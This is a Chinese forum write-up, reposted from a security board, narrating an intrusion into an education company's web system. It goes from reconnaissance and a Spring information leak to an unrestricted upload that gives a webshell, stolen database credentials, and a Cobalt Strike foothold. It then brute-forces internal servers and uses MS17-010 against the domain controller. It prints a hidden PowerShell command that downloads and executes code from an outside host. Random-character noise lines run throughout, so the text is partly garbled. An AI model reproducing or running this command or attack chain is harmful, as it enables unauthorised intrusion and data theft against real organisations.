$ P9 p* j3 q4 X0 _
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
6 {1 U6 q. U# {( v7 k( g3 h
. J6 _ M" R. \# \+ L4 [
8 @, {, Y# M' c. O, V! `+ g - a* H+ c4 q6 i7 E6 w' A
4 _/ h$ t1 X4 b3 W- S8 [. t9 [2 Q) W2 x/ g( x
正文( {7 n: p2 E; P* r* ~' n
/ n7 m' D& v6 x( |- s5 U M8 f ~
0 t* Q9 ]* B8 |$ t- Z
" _9 P7 C- d" r- m% g8 V* F8 B + Z D6 a3 J: V
0 ]2 e3 }! F6 x$ X! n 目标:www.xxxx.com(一家教育机构) 9 J6 Y+ R' T( o% D" v; a) O
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
/ Y! b1 E x; B- U& B
1 Z5 ~$ G7 V" y) I. n7 l! j* i& \; p5 t2 v" ]9 @ w) S; [" m8 u) {8 \+ z
* i/ }% H$ ^ \" C$ m0 [
8 b3 P" b4 n2 ^
7 ]% Q( d: o4 J3 Q/ o2 O: ?( | 进行了简单的信息搜集 . @/ w P3 l' D9 z
: Q8 n- u$ r2 [3 g1 y) n$ j( ?0 x, m
+ W5 K! c: }/ | # P& w# k Z: L+ L; y1 Z. l
" U; S7 w2 Y: ^6 Y( \5 h' x
子域名搜集
! n, z* E; H$ K. f, g' B( ] 8 v* a! |2 ~3 v
, }+ V: W$ J! l8 d7 d1 d 9 |% V) T2 L$ N- [& {6 O; j( r
7 c! l- E! G$ n& K" A6 y
9 f4 A/ \+ O& t, I) d6 ?: G6 T
fofa找资产 9 R* ]: y0 d! u7 W
5 G, v/ F5 N5 m+ }/ I- I5 i
# I6 P7 K6 v- r3 P $ o- i; V% L* g u, g2 ~+ M
/ E( P; U2 s! q9 b3 N! t) e
0 n) V- q0 ~" _. @. e$ Q2 F. B
! Y% g5 I) _- x
; q/ h, d2 V8 O" i) D 一共七个资产。去重之后只有两个。
$ u o' c( l0 o& _. Q& a1 ? & a4 R9 t& O) U! _
2 U& q- o9 }# E ) e' R' D8 ]* m! D/ h \, U
, ?" I. o+ x) |
目录探测
4 H% C' w. z2 ]0 P5 k - i1 M q/ K7 u* V) ~
* ?9 m3 y% ?' ]! }+ N 4 ~9 }; {3 h9 A( Z3 {
( b+ _3 n% B: ~( c: z4 a8 ?+ [+ Q! D& ?, `7 x) L' q1 _( W' e
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
- o/ D; V5 I9 s 0 M* I: S- J& P
! i6 O# l7 f1 F
/ [, k, e% f0 R
: v1 e; U+ Y$ h" j3 }4 }' r
我又尝试了通过修改返回包来绕过登录界面
8 y( q1 m8 k( y3 X4 O
6 z ~0 K3 B% R3 z; u G) z
& b- l$ t( L( W9 ~( x1 j; \
# B+ R8 S+ r5 E" X: G
: m$ T+ g' f9 b( f0 q
, p1 ]7 W5 K6 |* K 还是不行,尝试注入无果4 E k3 F3 J/ I% e9 U
8 U2 v) ^; [: V u4 ?1 ^
- @1 Y8 {4 n1 q7 b5 D
" E5 U5 T' J! _- `
& F6 B; x: U+ |/ p( t8 k( r, q' J) ]: _) A3 S; M/ E% S
不过我目录探测出了一处Spring信息泄露 ) H( L W3 ]# c M3 c/ M/ Y
l7 @. G( o; r* ?
+ O, {0 C3 w! x 2 V4 n( Y' X0 D: e
( Z4 f/ V: q9 [: C
( F" N6 s/ Q: d; H: p @
6 V3 z: T* g+ b% m2 O% s. k2 E n$ Q$ L9 `( y
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
) @+ a- L" L9 M6 b, F) f5 M / l+ a' a- w0 y6 M
' o( H2 s0 v1 Y6 u( N : w# ]3 y8 T( \: D, b' o
$ i: i d+ q( q
/ D3 s+ h ~: D( t5 A- ` 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。7 _# U/ z: s# x
. @' w# q1 ^" C/ t
5 q8 x6 M' O1 I/ L0 k
/ T# f. U: K/ b+ U! Y. V
U2 g8 r O+ S6 W! K! L8 H' U
获取有些师傅到这一步就手机抓包电脑测了。
2 e, a8 V" a' `9 | $ F+ N0 x% d0 O
# B* a9 R7 H4 o9 X% q; W Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。. `4 O8 k) z% X* e
1 B# j2 f. g4 L% y7 F
3 h# G: f% v# H9 C7 b: [; K( l# I* Y
其中在一个公众号发现了小程序,可以进行注册。
9 @' ?2 e# i7 Q! o" _ \5 O
+ w) q7 `8 c# n: f; i5 b" C/ O- s7 ]0 Y& F: }) y
看到了头像上传,尝试上传获取WebShell0 y6 o/ ] C3 H5 n
% Q9 W3 k L$ D. x
. ~& P8 n( x v5 Y9 ]/ `6 x
+ b% E- v; V" H- r, [2 M b$ R" U ; }5 L6 e7 [* B7 {, \2 q# U
* j0 I& S0 Y3 M9 @) m. u$ k$ g 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
8 h2 ]! X- A" T2 o) n! i
9 U( ]8 c3 z) a/ r2 H" Y
g3 f( ?5 i3 O
: C/ g: z! h5 _# S9 r& ^ ) T* ]& b4 L1 i5 {6 d7 N) O5 c, L
3 y s* N# ^% S& A1 U+ e
然后上了大马' I: t, `. u2 y: e! i4 P
1 A& B: P: R+ ^) |
& u; w# }) _! ?0 Q: Z
4 G7 ]: S- o. E4 `* x8 r+ g4 H ; R, ]: s8 S* W; _& W
0 c3 Y6 Z* B0 b$ P
3 u* y9 w( M) X
" ?$ q) f# t, Y' @
+ d4 q+ w! ?+ m0 L+ L) c+ j 通过翻找文件发现数据库账号密码) T! [" }( u! T9 W; F8 [( l: A* F
% P2 ]6 @4 {- T* K& ~" W
& D7 s# I/ {3 j3 ?3 T9 B
5 {0 I' F) B& f' s% j( u
8 e& M7 z- O( @' P9 }, x' k
; I+ k6 K3 I2 N6 S' X; }0 d --内网渗透; ]& a) o" m3 K$ M! x- i
5 P9 H0 a+ b5 B- h: L/ i$ D2 t7 v! @! t$ W9 H
直接通过powershell执行 cs上线0 c6 {- j+ g0 \4 M7 w k4 _8 s
5 o+ u" [5 Q1 `* g1 U. N7 t
- l9 D! `! R0 e! M) P" I
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"! \& u* q% f- x! F6 a) L
0 N; J6 `5 U* D+ G; |1 [
: p( G! \+ ?$ Q : ?, h }' N) N. s- I
/ q' \' c) V+ I: e+ Z
) W9 |; m1 Q, R8 c# T- C2 A* p; | 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
/ {; r* }; K( p: J" m8 I* ` 0 g# {+ F+ A/ p% c4 V
8 X* a0 D4 L2 b! ^1 X+ W* {9 ~ ' N. K5 t4 q0 L% a6 m! Q r
X# y# ^+ h$ u+ \# `
' B: [2 v% ~( Q1 M0 K9 a$ K; r
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
/ _' d% A" y( T0 m; q, y% P / W1 f8 M1 \0 [8 F
8 I0 s8 H& r& J+ ?, [" b7 G+ W* h9 w; F9 ^& t- ]
8 F1 ~4 V, [, C8 U
8 v7 t/ O' M1 D * c8 o4 h, P5 s1 N$ H
1 Z* b' B5 d9 W! g
( `2 J* Y0 O E& a" e( r 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 + O: Q d& c. ?; Z! N2 d2 Z
$ g8 g9 o% }+ g6 c
* L% T: W; W3 @6 z- E7 u6 [' q
; Y1 \$ o0 X" r9 K) m9 `; _- y
6 N; u4 }" D: o0 f) i% e$ i | . b. w! c* |) i) d$ T
+ E4 z" A* m/ L4 Y$ Z& T
1 o4 }5 O3 H2 [) K" D & Z& [; O$ D/ }9 ~6 e& a7 b3 c
9 @/ @: a) w; K5 U& }( ^
5 S& ^- Y: j% A, i5 k 8 j1 Q& O6 S2 p
2 X' H) A+ a3 v0 e ) P# H6 u/ S8 B r# g( [$ P# R
/ Y( \# d4 f, \; |% e( x# ~7 y' X
小结
; B: B K y; R- z% W* K ( H2 G. q7 ^# B2 m1 G. H# M
1 d# `3 [" f Z( ~" }$ F1 A( n & ]# ^( B$ r$ }! d. O
6 \5 Y9 i2 A0 B% Q( C. K6 C
( N$ y: \$ ]; A8 R' F7 s8 y
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
$ g% F5 `' c( k( ~/ J& {9 H5 c 3 Y. K! M |$ |# M$ S& _* `- X
+ t( S1 T- W: n' f& V
# G: I. W! |# x" t ! s% z6 a5 t( N
6 V+ D+ v+ j5 b* g2 K- F9 p, _ - & z$ C& O, d* B! T
8 b. A2 e' [- w! R# I R: H% I3 C
O* }5 q' d8 D0 D; V -
7 k* h0 k- w9 X2 G1 J$ k/ N- S : J% p( _8 D1 M5 \6 [/ R; W
/ L: T+ L' L& {) M$ h
+ F+ L( q s! O% N+ Y
3 `" R( T7 b) E6 C# u
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
) a3 b# M/ c2 h$ ?' ?
* F* ]1 {9 E4 @. w
, i- m9 \" O( L1 N % Z. a3 J+ w# t! f+ I H
|